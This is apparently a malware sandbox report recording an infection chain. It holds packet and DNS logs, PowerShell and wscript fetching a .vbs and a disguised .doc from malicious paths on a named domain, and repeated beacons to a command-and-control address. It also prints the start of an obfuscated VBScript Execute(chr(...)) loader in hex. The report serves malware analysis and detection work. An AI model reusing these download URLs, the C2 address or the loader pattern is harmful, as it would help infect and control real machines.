                                                                                                                                                Dec 9, 2024 06:52:35.313051939 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.313116074 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:35.313791037 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:35.313803911 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.437566996 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.437659979 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.444946051 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.444963932 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.445225000 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.445307970 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.447077036 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.487338066 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138668060 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138705969 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138729095 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138814926 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.138816118 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.138844013 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138894081 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192826986 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192856073 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192929983 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192946911 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192965984 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192990065 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338624001 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338649988 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338710070 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338732004 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338771105 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338779926 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.367867947 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.367897987 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.367970943 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.368005037 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.368022919 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.368186951 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.400264025 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400291920 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400346994 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.400374889 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400404930 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.400414944 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.409045935 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.409123898 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.410468102 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.410478115 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.410742998 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.411962032 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.455332041 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523181915 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523206949 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523293972 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.523344994 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523425102 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.543941021 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.543972015 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.544044971 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.544080973 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.544106007 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.544332981 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.566895962 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.566931963 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.566970110 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.567003012 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.567020893 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.567049980 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585676908 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585706949 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585755110 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585781097 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585793972 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585851908 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599436045 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599463940 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599512100 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599528074 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599556923 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599566936 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715768099 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715826988 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715851068 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715864897 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715894938 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715909958 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.716316938 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.716336966 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.234015942 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.273943901 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.273971081 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353315115 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353334904 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353411913 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.353449106 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353482008 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353503942 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.353511095 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.353526115 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.353543043 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.460536957 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.460551977 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.460596085 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.460613012 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.460622072 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.460663080 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.460669041 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.460711956 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.504314899 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.504343033 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.504400015 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.504426003 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.504441977 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.504460096 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.632075071 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.632100105 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.632159948 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.632178068 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.632222891 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.657051086 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.657083035 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.657140017 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.657164097 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.657186031 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.657213926 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.675546885 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.675575018 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.675648928 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.675676107 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.675720930 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.695132017 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.695154905 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.695219994 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.695233107 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.695305109 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.822000027 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.822032928 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.822083950 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.822115898 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.822139025 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.822160959 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.836900949 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.836932898 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.836980104 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.837002993 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.837035894 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.841260910 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.841331959 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.841339111 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.841353893 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.841379881 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.841403961 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.843620062 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.843636990 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:38.843648911 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:38.843655109 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:54.707756996 CET498864567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:52:54.829021931 CET45674988687.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:54.829111099 CET498864567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:52:56.959577084 CET45674988687.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:56.959642887 CET498864567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:06.965554953 CET499244567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:07.085529089 CET45674992487.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:07.085614920 CET499244567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:09.215837955 CET45674992487.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:09.215925932 CET499244567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:19.215732098 CET499564567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:19.335822105 CET45674995687.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:19.335908890 CET499564567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:21.484061003 CET45674995687.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:21.484155893 CET499564567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:31.481625080 CET499844567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:31.601082087 CET45674998487.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:31.601339102 CET499844567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:33.749871016 CET45674998487.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:33.749994993 CET499844567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:43.761097908 CET500134567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:43.880451918 CET45675001387.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:43.880552053 CET500134567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:46.033174038 CET45675001387.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:46.033711910 CET500134567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:56.040226936 CET500424567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:56.159579992 CET45675004287.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:56.159815073 CET500424567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:53:58.312742949 CET45675004287.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:53:58.312812090 CET500424567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:08.309923887 CET500734567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:08.440057993 CET45675007387.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:54:08.440130949 CET500734567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:10.559665918 CET45675007387.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:54:10.560415030 CET500734567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:20.592341900 CET500994567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:20.711818933 CET45675009987.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:54:20.711908102 CET500994567192.168.2.787.120.121.160
                                                                                                                                                Dec 9, 2024 06:54:22.841243982 CET45675009987.120.121.160192.168.2.7
                                                                                                                                                Dec 9, 2024 06:54:22.841295958 CET500994567192.168.2.787.120.121.160

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 9, 2024 06:52:23.958283901 CET6207953192.168.2.71.1.1.1
                                                                                                                                                Dec 9, 2024 06:52:24.102601051 CET53620791.1.1.1192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:54.279819012 CET6330353192.168.2.71.1.1.1
                                                                                                                                                Dec 9, 2024 06:52:54.416631937 CET53633031.1.1.1192.168.2.7

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 9, 2024 06:52:23.958283901 CET192.168.2.71.1.1.10x1497Standard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:54.279819012 CET192.168.2.71.1.1.10x3e83Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 9, 2024 06:52:24.102601051 CET1.1.1.1192.168.2.70x1497No error (0)www.stipamana.com94.156.167.57A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.181A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.180A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.182A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.185A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.186A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.176A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.179A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:35.309721947 CET1.1.1.1192.168.2.70x40aNo error (0)mira-tmc.tm-4.office.com52.123.243.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:46.107664108 CET1.1.1.1192.168.2.70x1bc0No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:54.416631937 CET1.1.1.1192.168.2.70x3e83No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:58.234483004 CET1.1.1.1192.168.2.70x8eb1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Dec 9, 2024 06:52:58.234483004 CET1.1.1.1192.168.2.70x8eb1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • www.stipamana.com
                                                                                                                                                • ecs.office.com

                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.74969994.156.167.574432892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-09 05:52:25 UTC145OUTGET /vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs HTTP/1.1
                                                                                                                                                Host: www.stipamana.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-09 05:52:26 UTC209INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 09 Dec 2024 05:52:26 GMT
                                                                                                                                                Content-Length: 10363
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Sun, 08 Dec 2024 09:07:25 GMT
                                                                                                                                                ETag: "287b-628be93924d40"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-09 05:52:26 UTC10363INData Raw: 45 78 65 63 75 74 65 28 63 68 72 28 34 39 2b 33 34 29 26 20 63 68 72 28 31 39 35 2d 39 34 29 26 20 63 68 72 28 31 36 36 2d 35 30 29 26 20 63 68 72 28 31 32 39 2d 39 37 29 26 20 63 68 72 28 31 39 34 2d 38 33 29 26 20 63 68 72 28 31 31 2b 38 37 29 26 20 63 68 72 28 31 33 33 2d 32 37 29 26 20 63 68 72 28 31 30 35 2d 31 38 29 26 20 63 68 72 28 35 36 37 30 2f 35 34 29 26 20 63 68 72 28 31 37 34 2d 36 34 29 26 20 63 68 72 28 37 2b 36 35 29 26 20 63 68 72 28 34 30 36 30 2f 33 35 29 26 20 63 68 72 28 36 30 2b 35 36 29 26 20 63 68 72 28 31 36 2a 37 29 26 20 63 68 72 28 31 31 36 2d 38 34 29 26 20 63 68 72 28 32 30 31 33 2f 33 33 29 26 20 63 68 72 28 2d 34 38 2b 38 30 29 26 20 63 68 72 28 31 30 2b 35 37 29 26 20 63 68 72 28 35 38 31 34 2f 35 31 29 26 20 63 68 72 28
                                                                                                                                                Data Ascii: Execute(chr(49+34)& chr(195-94)& chr(166-50)& chr(129-97)& chr(194-83)& chr(11+87)& chr(133-27)& chr(105-18)& chr(5670/54)& chr(174-64)& chr(7+65)& chr(4060/35)& chr(60+56)& chr(16*7)& chr(116-84)& chr(2013/33)& chr(-48+80)& chr(10+57)& chr(5814/51)& chr(


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.74970194.156.167.574436560C:\Windows\System32\wscript.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-09 05:52:28 UTC288OUTGET /docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/plain; Charset=UTF-8
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: www.stipamana.com
                                                                                                                                                2024-12-09 05:52:28 UTC314INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 09 Dec 2024 05:52:28 GMT
                                                                                                                                                Content-Type: application/msword
                                                                                                                                                Content-Length: 199680
                                                                                                                                                Last-Modified: Sun, 08 Dec 2024 09:04:05 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "67556105-30c00"
                                                                                                                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                Cache-Control: max-age=315360000
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-09 05:52:28 UTC16070INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 5d 01 00 00 00 00 00 00 00 10 00 00 60 01 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 5a 01 00 00 5b 01 00 00 5c 01 00 00 80 01 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                Data Ascii: >]`Z[\
                                                                                                                                                2024-12-09 05:52:28 UTC16384INData Raw: e7 19 83 dc f6 d1 9e 3a b6 dd b3 41 bd df 0d 32 50 ca a4 3e 24 0f 19 1b e5 e7 9e 32 5e c8 1e 77 8f b1 df 91 8d ce 69 43 3e 17 a8 c3 6d 28 3e cb 63 e7 39 e0 67 b8 9c db c8 27 cf a5 6e 8b 26 78 17 dc 67 7b 46 cf 37 7b 7a f1 e9 fb f3 e7 b8 9f 94 f7 91 7b 05 d9 1b aa 3a 87 aa ef d8 f5 e5 73 3c af 3b af 33 6f 3b df 8b cf f3 18 db 26 96 31 f3 e6 e8 31 b4 a7 50 ee 31 c6 bb b6 2d 6c ee b9 96 53 91 45 68 68 b2 e1 bf 32 58 b6 e7 2d d1 b9 e6 fd 36 ee 82 7a bc 7b 97 49 dd 51 b0 2c cf d8 d8 9e 9d 5c 73 31 fc 36 e6 4d 59 2f 72 4f 9e a2 a9 59 be c9 36 c1 b2 eb e7 c0 63 51 96 39 a5 d3 f4 0a a8 ff 72 a0 26 ef dd 4b 5e 3a b5 34 de b5 84 f2 65 f6 97 5d 3f 15 9a 35 3e 2b 23 60 a5 5f bd f6 36 37 cc ae 7f 9b 5d 0a 96 4d ea b2 fe 0b 2a 9a 03 b5 f7 3a 9b 13 be bd 11 6a 5e 6f 8e
                                                                                                                                                Data Ascii: :A2P>$2^wiC>m(>c9g'n&xg{F7{z{:s<;3o;&11P1-lSEhh2X-6z{IQ,\s16MY/rOY6cQ9r&K^:4e]?5>+#`_67]M*:j^o
